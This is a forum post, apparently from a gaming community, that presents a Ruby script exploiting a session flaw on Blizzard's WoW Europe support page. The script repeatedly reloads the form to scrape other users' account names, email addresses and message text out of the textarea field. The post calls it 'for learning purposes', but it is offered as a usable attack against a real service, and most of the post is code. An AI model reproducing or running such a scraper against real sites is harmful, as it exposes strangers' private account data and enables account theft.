[Exploit] Steal account names, emails, etc.

[masterkain]

First, sorry for posting in the wrong forums, but I cannot post in the right one since I haven't wrote yet 5 posts.

What follows is a very RAW, basic and stripped down Ruby script that will attempt to exploit the blizzard support page. It's meant for very expert and advanced users, therefore don't ask what's wrong in this script and why it doesn't works.

It's very dangerous to use this script and I post it here only for learning purposes.

I don't know if Blizzard right now is hotfixing the issue, but they used CAPTCHA on their support page, making use of sessions. What happens is that when a user enters the wrong CAPTCHA meanwhile we are reloading the page, our web page fields will be filled with their required informations. Thus, account name, email, and even what they are writing to Blizzard.

Code:

#!ruby

require 'rubygems'
require 'hpricot'
require 'open-uri'
require 'net/https'

i = 100
while i > 0
  html = Net::HTTP.new("ww. wow-europe. com", 443)
  html.use_ssl = true
  html.start do |http|
    sleep 2
    req = Net::HTTP::Get.new("/support/ securitywebform/se curitywebform2 .html", {"User-Agent" =>
    "test"})
    response = http.request(req)
    resp = response.body

    doc = Hpricot(resp)
    #p doc
    p doc.search("//textarea").inner_html
  end
end